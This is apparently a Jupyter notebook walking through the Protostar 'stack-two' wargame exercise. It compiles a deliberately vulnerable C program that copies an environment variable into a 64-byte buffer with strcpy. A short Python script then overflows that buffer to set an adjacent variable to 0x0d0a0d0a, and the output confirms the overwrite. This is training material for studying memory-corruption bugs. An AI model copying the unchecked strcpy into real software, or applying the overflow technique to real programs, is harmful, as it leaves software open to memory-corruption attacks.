# protostar/stack2 solution

https://exploit.education/protostar/stack-two/

## compile source code

In [1]:
import os

src = r"""

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];
  char *variable;

  variable = getenv("GREENIE");

  if(variable == NULL) {
      errx(1, "please set the GREENIE environment variable\n");
  }

  modified = 0;

  strcpy(buffer, variable);

  if(modified == 0x0d0a0d0a) {
      printf("you have correctly modified the variable\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }

}

"""

with open("src.c", "w") as f:
    f.write(src)
    
_ = os.system('gcc src.c -m32 -w -o prog')  # 32bit. disable warnings.

## solution

Setting enviroment variable with length > 64 will cause a buffer overflow.
The next 4 bytes after the buffer should be `0x0d0a0d0a`.

In [2]:
#!/usr/bin/env python3
import subprocess
import struct

bts = b'A'*64 + struct.pack("<I", 0x0d0a0d0a)  # Pack 0x0d0a0d0a as little endian.
os.environ["GREENIE"] = bts.decode('utf-8')
res = subprocess.run(['./prog'], capture_output=True)
del os.environ['GREENIE']
print(res.stdout.decode('utf-8'))

you have correctly modified the variable



In [3]:
import sys
print("Python version")
print (sys.version)

Python version
3.9.10 (main, Jan 16 2022, 17:12:18) 
[GCC 11.2.0]
